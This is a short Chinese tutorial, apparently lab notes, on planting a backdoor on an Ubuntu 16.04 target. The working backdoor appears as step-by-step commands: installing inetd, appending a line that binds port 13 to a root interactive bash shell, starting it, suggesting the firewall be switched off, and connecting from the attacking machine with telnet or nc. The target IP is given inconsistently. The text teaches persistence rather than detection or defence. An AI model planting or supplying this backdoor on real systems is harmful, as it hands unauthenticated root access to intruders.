环境
靶机:Ubuntu 16.04.7 LTS (最好使用相同的版本或更老的版本,inetd是非常老的系统服务管理工具) 192.17.0.4
攻击机:
安装inetd
apt update
apt-get install openbsd-inetd
#检查是否安装成功,如果文件存在就安装成功
ls /etc/inetd.conf
修改配置并启动
#修改配置
echo "daytime stream tcp nowait root /bin/bash bash -i" >> /etc/inetd.conf
#启动
inetd
#要使得后门生效一定要让防火墙放开相应得端口,这里的端口号是13。防火墙开放端口的命令太长不记得了,直接关闭防火墙也可以
systemctl status firewalld
#检查inetd进程和端口13是否启动了
netstat -ltupan|grep inetd
tcp 0 0 0.0.0.0:13 0.0.0.0:* LISTEN 663/inetd
连接后门
使用攻击机访问靶机的端口。有很多种方法可以连接。一般的,只要支持tcp协议的工具都能连接
#在攻击机上执行
#1.使用telnet连接
telnet 172.17.0.4 13
#连接成功后就可以执行其他命令了#2.使用nc连接
nc -v 172.17.0.4 13
至此,此后门的使用方法您已经学会了!!!
注:如果操作系统和inetd不好安装,可以尝试使用docker安装,方便快捷。